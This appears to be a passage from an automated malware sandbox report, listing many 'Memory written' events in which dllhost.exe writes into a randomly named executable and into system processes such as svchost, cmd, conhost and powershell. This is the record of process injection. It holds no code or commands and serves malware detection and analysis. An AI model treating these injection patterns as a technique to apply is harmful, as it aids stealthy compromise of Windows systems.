Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: CB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1000000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 277167A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 277167D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 22123BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 22123BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 13F081C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 13F08E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FD17760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FD186A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
